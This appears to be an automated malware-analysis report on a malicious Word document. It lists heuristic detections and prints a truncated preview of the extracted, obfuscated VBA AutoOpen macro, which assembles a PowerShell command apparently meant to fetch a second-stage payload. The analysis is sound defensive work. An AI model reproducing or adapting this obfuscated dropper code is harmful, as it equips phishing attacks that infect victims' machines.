MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro attempts to execute a PowerShell command, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6550168-0' further supports its role as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6573679-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6573679-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 242516 bytes |
SHA-256: 4dc2186c2528d8c988b36f9aa0bf6dcf83eb03ef2f0c96f20ec1329ff90f72c7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iqDnpbAGZQXl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function zlfIH() On Error Resume Next llquWbwT = (sLsLFCT - CDbl(918853) + lPBjvEDOz + Fix(uiLQqpizK / CLng(385096 * Sqr(ZZsviLGDMs))) - 889870 / Sin(kDEkZQpqj - fXsEkKcUCd - 964970 + CLng(sjHLW)) * 636933 * Fix(918853)) WRjzJ = "cKdsDm9tZ1xMQnowershell ((GDyueNxA'(Jxu3JxXySvgYqIhOF6d0g18StfbwJ" vmRari = CStr(Left(Right(WRjzJ, 52), 13)) + Left(Right(WRjzJ, 31), 8) + CStr(Left(Right(WRjzJ, 36), 1)) jikrdLp = Chr(43) jmUCWHAU = "zxPff65z6JxuhJeVdguMW" qDsrQEj = Left(Right(jmUCWHAU, 12), 5) + CStr(Left(Right(jmUCWHAU, 20), 1)) + CStr(Left(Right(jmUCWHAU, 3), 1)) XlrRcB = Chr(43) oSvohjLD = "zJxff65z67YYJxuRnsEMW9auepf" YkaPWsfTzG = Left(Right(oSvohjLD, 15), 6) + Left(Right(oSvohjLD, 26), 2) + Left(Right(oSvohjLD, 4), 1) rQjbUMZBjhv = Chr(43) hRZHCQP = "zxuff65z67YJxuaJdgEM'9ac" vGLYupzRqiq = CStr(Left(Right(hRZHCQP, 13), 5)) + CStr(Left(Right(hRZHCQP, 23), 2)) + CStr(Left(Right(hRZHCQP, 4), 1)) GDwSYL = Chr(43) KPEUNY = "T'3" ulSMTjwQf = Left(Right(KPEUNY, 2), 1) aVGcsiILTk = Chr(43) zYUZPMkjOY = (HFbGzzLDtM - CDbl(140075) + zPlzAJcl + Fix(PTbnE / CLng(182780 * Sqr(PrwolFrd))) - 491146 / Sin(XtqCJRqwfVY - nSMbG - 395864 + CLng(XXodnBUh)) * 389995 * Fix(140075)) ritfFjzWc = "zxPff65z6JxudJeVdguMW" lSSLGijc = Left(Right(ritfFjzWc, 12), 5) + CStr(Left(Right(ritfFjzWc, 20), 1)) + CStr(Left(Right(ritfFjzWc, 3), 1)) hNlSDSba = Chr(43) plVutXu = "Pffpnz67YY6HeVdfpMW9acepJxuasd = &(e2JGRt3ODDKexxNqhNp" afzwV = CStr(Left(Right(plVutXu, 30), 12)) + CStr(Left(Right(plVutXu, 52), 3)) + Left(Right(plVutXu, 8), 1) + CStr(Left(Right(plVutXu, 39), 2)) MtqoWNKmW = Chr(43) NzFrvN = "x'IPff65efpJY6HeVd" mvlSkW = CStr(Left(Right(NzFrvN, 10), 4)) + Left(Right(NzFrvN, 18), 1) + Left(Right(NzFrvN, 17), 1) jTKrUZb = Chr(43) kwhPmB = "Tb'u3u" PNssacnznzM = CStr(Left(Right(kwhPmB, 4), 2)) uGLXaPGRXq = Chr(43) zSXiXZHnRFS = (ZYEVoN - CDbl(254695) + IlAGtX + Fix(zLEfT / CLng(341653 * Sqr(SYtpzUps))) - 601801 / Sin(YWnAGTiv - GiZqMzMdLUZ - 217078 + CLng(illwqAiPVTX)) * 760280 * Fix(254695)) Wjchbla = "zfPff65z6JxueeeVdgpMW" rqFHTjVlCJ = Left(Right(Wjchbla, 12), 5) + CStr(Left(Right(Wjchbla, 20), 1)) + CStr(Left(Right(Wjchbla, 3), 1)) VONAWvazIC = Chr(43) PWpVLwSGjSr = "T'3" rMjmRoU = Left(Right(PWpVLwSGjSr, 2), 1) JOthD = Chr(43) ksDqm = "xuIPff65'efJY6HeVd" nUGZX = CStr(Left(Right(ksDqm, 10), 4)) + Left(Right(ksDqm, 18), 1) + Left(Right(ksDqm, 17), 1) hQzzZcj = (uiaTYk - CDbl(523179) + NwlKho + Fix(jfRdBwbHv / CLng(479372 * Sqr(ZHpZFtBwYSP))) - 104894 / Sin(zYMHW - AHNzdDh - 545201 + CLng(hvaiinn)) * 194538 * Fix(523179)) HiEOiEUITa = Chr(43) BCkBZ = "zxPff65z6JxupJeVdguMW" CzPVwT = Left(Right(BCkBZ, 12), 5) + CStr(Left(Right(BCkBZ, 20), 1)) + CStr(Left(Right(BCkBZ, 3), 1)) UwZbQarulOj = Chr(43) SkmbZasfqr = "PfceJz67YY6HuVdgEMWJxuw-objeTSj6M22UxJGRt3" IqvIXvUuSKu = Left(Right(SkmbZasfqr, 23), 9) + Left(Right(SkmbZasfqr, 40), 3) + Left(Right(SkmbZasfqr, 6), 1) + Left(Right(SkmbZasfqr, 30), 1) RkaNMn = Chr(43) BOIGibrU = "T'3" XjGNZ = Left(Right(BOIGibrU, 2), 1) fRiWkSG = Chr(43) ilzwazNmo = "zJxff65z67Y'JxufdgEMu9ac" ZRTHpsai = CStr(Left(Right(ilzwazNmo, 13), 5)) + CStr(Left(Right(ilzwazNmo, 23), 2)) + CStr(Left(Right(ilzwazNmo, 4), 1)) aKDNKfAi = Chr(43) GWvZt = (fCVEU - CDbl(184285) + irCUsSLOrk + Fix(AzoCs / CLng(264085 * Sqr(PdRMtYL))) - 44339 / Sin(nQGWa - kWsKf - 557303 + CLng(XvRjEPVWu)) * 427800 * Fix(184285)) IAWtqSDJEB = "zxPff65z6JxupJeVdguMW" YFzHTJWZ = Left(Right(IAWtqSDJEB, 12), 5) + CStr(Left(Right(IAWtqSDJEB, 20), 1)) + CStr(Left(Right(IAWtqSDJEB, 3), 1)) QQGFiAVjNHl = Chr(43) Ncpsv = "u3uzJxff6" NjqhWirHW = Left(Right(Ncpsv, 5), 2) + CStr(Left(Right(Ncpsv, 9), 1)) iBNvCFAZs = Chr(43) iCpiGBcd = "u3uzIeJx65z6" vzYipTrCC = Left(Right(iCpiGBcd, 7), 3) + CStr(Le ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.